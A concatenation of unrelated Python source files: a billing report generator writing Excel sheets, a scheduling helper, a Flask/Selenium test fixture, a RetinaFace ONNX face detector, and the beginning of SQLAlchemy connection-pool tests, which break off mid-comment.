def get_billing_profile_id(self, job_id):
""" return billing profile id given job id """
billing_profile_id = ""
for job in self.jobs:
if job["id"] == job_id:
billing_profile_id = job["billing_profile_id"]
break
if not billing_profile_id and job_id:
raise Exception(f"Billing Profile for Job {job_id} non trovato")
return billing_profile_id
def parse_total(self, data, divided_by_job=False):
"""
if divided_by_job == False return a tuple containing ({worker:total}, {total:total})
if divided_by_job == True return a tuple containing ({job:{<worker>:total, job_total:job_total}}, {total:total})
"""
total = {}
new_data = {}
if not divided_by_job:
for worker in data:
new_data[worker] = {}
for day in data[worker]:
for hour_type in data[worker][day]:
# add to worker data
if hour_type in new_data[worker]:
new_data[worker][hour_type] += data[worker][day][hour_type]
else:
new_data[worker][hour_type] = data[worker][day][hour_type]
# add to total
if hour_type in total:
total[hour_type] += data[worker][day][hour_type]
else:
total[hour_type] = data[worker][day][hour_type]
# round values
for h in new_data[worker]:
new_data[worker][h] = self.__round_float(new_data[worker][h], decimal_pos=2)
elif divided_by_job:
for job in data:
new_data[job] = {}
for worker in data[job]:
new_data[job][worker] = {}
for day in data[job][worker]:
for hour_type in data[job][worker][day]:
if hour_type not in new_data[job][worker]:
new_data[job][worker][hour_type] = 0.0
new_data[job][worker][hour_type] += data[job][worker][day][hour_type]
# parse total for job and round values
job_total = {}
for worker_ in new_data[job]:
for hour_type in new_data[job][worker_]:
# add to job_total
if hour_type not in job_total:
job_total[hour_type] = 0.0
job_total[hour_type] += new_data[job][worker_][hour_type]
# add to total
if hour_type not in total:
total[hour_type] = 0.0
total[hour_type] += new_data[job][worker_][hour_type]
new_data[job][worker_][hour_type] = self.__round_float(new_data[job][worker_][hour_type],
decimal_pos=2)
new_data[job]["job_total"] = job_total
# round values
for h in total:
total[h] = self.__round_float(total[h], decimal_pos=2)
return (new_data, total)
'''
# probably will be deleted
def parse_jobs_to_profiles(self, workers_jobs):
""" creating a dict from parsing every worker day to its billing profile and returning it """
workers_billing_profiles = {}
for w in workers_jobs:
workers_billing_profiles[w] = {}
for day in workers_jobs[w]:
if not workers_jobs[w][day]:
workers_billing_profiles[w][day] = ""
else:
workers_billing_profiles[w][day] = self.get_billing_profile_id(workers_jobs[w][day])
return workers_billing_profiles
def _bill(self, hours, jobs, billing_profiles, bill_by_job=True, dump_values=False, dump_detailed=False):
billed_hours = {}
####### unic sheet
if not bill_by_job:
for w in hours:
billed_hours[w] = {}
w_hours = hours[w]
w_jobs = jobs[w]
w_billing_profiles = billing_profiles[w]
for day in w_hours:
day_job = w_jobs[day]
day_billing_profile_id = w_billing_profiles[day]
day_billing_profile = self.get_billing_profile_obj(day_billing_profile_id)
# if worker worked that day bill it, else append 0 values
if day_job:
billed_hours[w][day] = self.__apply_billing_profile(w_hours[day], day_billing_profile)
else:
billed_hours[w][day] = w_hours[day]
new_billed_hours, total_billing = self.parse_total(billed_hours, divided_by_job=False)
new_hours_data, total_hours = self.parse_total(hours, divided_by_job=False)
self.create_Excel(new_hours_data, total_billing, bill_by_job=bill_by_job)
#### a sheet for every job
elif bill_by_job:
hours_by_job = {}
for w in jobs:
if w != "job_total":
for day in jobs[w]:
current_job = jobs[w][day]
if current_job:
current_job = self.get_jobname(current_job)
if current_job not in hours_by_job:
hours_by_job[current_job] = {}
if w not in hours_by_job[current_job]:
hours_by_job[current_job][w] = {}
hours_by_job[current_job][w][day] = hours[w][day]
for job in hours_by_job:
billed_hours[job] = {}
for w in hours_by_job[job]:
if w != "job_total":
billed_hours[job][w] = {}
for day in hours_by_job[job][w]:
billed_hours[job][w][day] = self.__apply_billing_profile(hours_by_job[job][w][day],self.get_billing_profile_obj(billing_profiles[w][day]))
new_billed_hours, total_billing = self.parse_total(billed_hours, divided_by_job=True)
new_hours_data, total_hours = self.parse_total(hours_by_job, divided_by_job=True)
self.create_Excel(new_hours_data, new_billed_hours, bill_by_job=bill_by_job)
# conditional dump values
if dump_detailed:
with open("DETAIL_ore_lavoratori.json", "w") as f:
f.write(json.dumps(hours, indent=4, ensure_ascii=True))
with open("DETAIL_valori_da_fatturare.json", "w") as f:
f.write(json.dumps(billed_hours, indent=4, ensure_ascii=True))
if dump_values:
with open("ore_lavoratori.json", "w") as f:
f.write(json.dumps(new_hours_data, indent=4, ensure_ascii=True))
with open("valori_da_fatturare.json", "w") as f:
f.write(json.dumps(new_billed_hours, indent=4, ensure_ascii=True))
print(">> Billed Successfully")
def create_Excel(self, data, total_billing, transposed=True, bill_by_job=False):
for job in data:
total_ = data[job].pop("job_total") if bill_by_job else total_billing
# adjust to billing type
if bill_by_job:
df = pd.DataFrame.from_dict(data[job])
else:
job = "Report Fatturazione"
df = pd.DataFrame.from_dict(data)
if transposed:
df = df.T
# sort alphabetically rows and columns
df = df.sort_index()
df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
# add totals (rows total/column total)
df.loc[">> ORE TOTALI <<"] = df.sum(axis=0, numeric_only=True)
if bill_by_job:
df.loc[">> € DA FATTURARE <<"] = total_
df['TOTALI'] = df.sum(axis=1, numeric_only=True)
# polish
df.index.rename("LAVORATORI", inplace=True)
df.replace(0, np.nan, inplace=True)
#generating excel with df data
mode = "a" if os.path.exists(self.bill_name) else "w"
with pd.ExcelWriter(self.bill_name, mode=mode) as writer:
df.to_excel(writer, sheet_name=job, na_rep=0, float_format="%.2f")
ws = writer.sheets[job]
footer_color = PatternFill(start_color="e6e6e6", end_color="e6e6e6", fill_type="solid")
# color last rows
last_rows_to_style = 2 if bill_by_job else 1
added_rows = 2 if bill_by_job else 1
for row in range(last_rows_to_style, 0, -1):
for cell in ws[f"{(len(df)+1+added_rows)-row}:{(len(df)+1+added_rows)-row}"]:
cell.font = openpyxl.styles.Font(bold=True)
cell.fill = footer_color
if bill_by_job and row == last_rows_to_style:
cell.number_format = '#,##0.00€'
# if single sheet result break
if not bill_by_job:
break
'''
|
scheduling.py
|
"""
This module provides functionality for timing of methods.
"""
import time
import threading
def run_function_every_n_seconds(fn, fn_args, seconds):
"""
Runs a function every n seconds.
:param fn: The function to run
:param fn_args: Arguments to pass to the function as list
:param seconds: Timeinterval in seconds between function executions
:return: None
"""
start_time = time.time()
while True:
fn(fn_args)
time.sleep(seconds - ((time.time() - start_time) % seconds))
def run_function_every_n_seconds_thread(fn, fn_args, seconds):
thread = threading.Thread(name="run_function_every_n_seconds",
target=run_function_every_n_seconds, args=[fn, fn_args, seconds])
def run_function_after_n_seconds(fn, fn_args, seconds):
"""
Runs a function after n seconds have passed
:param fn:
:param fn_args:
:param seconds:
:return:
"""
start_time = time.time()
time.sleep(seconds - ((time.time() - start_time) % seconds))
fn(fn_args)
def run_function_after_n_seconds_thread(fn, fn_args, seconds):
thread = threading.Thread(name="run_function_after_n_seconds",
target=run_function_after_n_seconds, args=[fn, fn_args, seconds])
thread.start()
|
conftest.py
|
import multiprocessing
import os
import tempfile
import threading
import time
import config
import pytest
from selenium import webdriver
from app import app, db
class LiveClient(object):
def __init__(self):
app.config.from_object(config.Config)
app.config.from_envvar("WOLFIT_SETTINGS")
app.config["WTF_CSRF_ENABLED"] = False
app.config["LIVESERVER_PORT"] = 5000
# app.config['SERVER_NAME'] = 'localhost'
def get_server_url(self):
"""
Return the url of the test server
"""
return "http://localhost:5000"
def begin(self):
db.session.close()
db.drop_all()
db.create_all()
self.ctx = app.app_context()
options = webdriver.ChromeOptions()
options.add_argument("headless")
self.browser = webdriver.Chrome(chrome_options=options)
# Start Flask server in a thread
threading.Thread(target=app.run).start()
time.sleep(0.5)
self.ctx.push()
def end(self):
# remove application context
self.ctx.pop()
self.browser.get(f"{(self.get_server_url())}/shutdown")
self.browser.quit()
@pytest.fixture(scope="module")
def client():
return LiveClient()
|
retinaface.py
|
import sys
import numpy as np
import cv2
import onnxruntime
import time
import queue
import threading
import json
import copy
def py_cpu_nms(dets, thresh):
""" Pure Python NMS baseline.
Copyright (c) 2015 Microsoft
Licensed under The MIT License
Written by Ross Girshick
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= thresh)[0]
order = order[inds + 1]
return keep
def decode(loc, priors, variances):
data = (
priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],
priors[:, 2:] * np.exp(loc[:, 2:] * variances[1])
)
boxes = np.concatenate(data, 1)
boxes[:, :2] -= boxes[:, 2:] / 2
boxes[:, 2:] += boxes[:, :2]
return boxes
def worker_thread(rfd, frame):
results = rfd.detect_retina(frame, is_background=True)
rfd.results.put(results, False)
rfd.finished = True
rfd.running = False
class RetinaFaceDetector():
def __init__(self, model_path="models/retinaface_640x640_opt.onnx", json_path="models/priorbox_640x640.json", threads=4, min_conf=0.4, nms_threshold=0.4, top_k=1, res=(640, 640)):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = threads
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.session = onnxruntime.InferenceSession(model_path, sess_options=options)
self.res_w, self.res_h = res
with open(json_path, "r") as prior_file:
self.priorbox = np.array(json.loads(prior_file.read()))
self.min_conf = min_conf
self.nms_threshold = nms_threshold
self.top_k = top_k
self.finished = False
self.running = False
self.results = queue.Queue()
def detect_retina(self, frame, is_background=False):
h, w, _ = frame.shape
im = None
im = cv2.resize(frame, (self.res_w, self.res_h), interpolation=cv2.INTER_LINEAR)
resize_w = w / self.res_w
resize_w = 1 / resize_w
resize_h = h / self.res_h
resize_h = 1 / resize_h
im = np.float32(im)
scale = np.array((self.res_w / resize_w, self.res_h / resize_h, self.res_w / resize_w, self.res_h / resize_h))
im -= (104, 117, 123)
im = im.transpose(2, 0, 1)
im = np.expand_dims(im, 0)
output = self.session.run([], {"input0": im})
loc, conf = output[0][0], output[1][0]
boxes = decode(loc, self.priorbox, [0.1, 0.2])
boxes = boxes * scale
scores = conf[:, 1]
inds = np.where(scores > self.min_conf)[0]
boxes = boxes[inds]
scores = scores[inds]
dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=False)
keep = py_cpu_nms(dets, self.nms_threshold)
dets = dets[keep, :]
dets = dets[:self.top_k, 0:4]
dets[:, 2:4] = dets[:, 2:4] - dets[:, 0:2]
if True:#is_background:
upsize = dets[:, 2:4] * np.array([[0.15, 0.2]])
dets[:, 0:2] -= upsize
dets[:, 2:4] += upsize * 2
return list(map(tuple, dets))
def background_detect(self, frame):
if self.running or self.finished:
return
self.running = True
im = copy.copy(frame)
thread = threading.Thread(target=worker_thread, args=(self, im))
thread.start()
def get_results(self):
if self.finished:
results = []
try:
while True:
detection = self.results.get(False)
results.append(detection)
except:
"No error"
self.finished = False
return list(*results)
else:
return []
if __name__== "__main__":
retina = RetinaFaceDetector(top_k=40, min_conf=0.2)
im = cv2.imread(sys.argv[1], cv2.IMREAD_COLOR)
start = time.perf_counter()
faces = retina.detect_retina(im)
end = 1000 * (time.perf_counter() - start)
print(f"Runtime: {end:.3f}ms")
for (x,y,w,h) in faces:
im = cv2.rectangle(im, (int(x),int(y)), (int(x+w),int(y+w)), (0,0,255), 1)
cv2.imshow("Frame", im)
while cv2.waitKey(0) & 0xff != ord('q'):
""
|
test_pool.py
|
import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select(1).compile(testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_threadconns",
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append("checkin")
event.listen(p, "checkin", checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_insert_event(self):
p = self._queuepool_fixture()
canary = []
def connect_one(*arg, **kw):
canary.append("connect_one")
def connect_two(*arg, **kw):
canary.append("connect_two")
def connect_three(*arg, **kw):
canary.append("connect_three")
event.listen(p, "connect", connect_one)
event.listen(p, "connect", connect_two, insert=True)
event.listen(p, "connect", connect_three)
p.connect()
eq_(canary, ["connect_two", "connect_one", "connect_three"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.requires.predictable_gc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ["checkin"])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select(1)).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
reaper = testing.engines.ConnectionKiller()
reaper.add_pool(p)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
reaper.assert_all_closed()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.timing_intensive
def test_timeout_subsecond_precision(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0, timeout=0.5)
c1 = p.connect() # noqa
with expect_raises(tsa.exc.TimeoutError):
now = time.time()
c2 = p.connect() # noqa
# Python timing is not very accurate, the time diff should be very
# close to 0.5s but we give 200ms of slack.
assert 0.3 <= time.time() - now <= 0.7, "Pool timeout not respected"
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
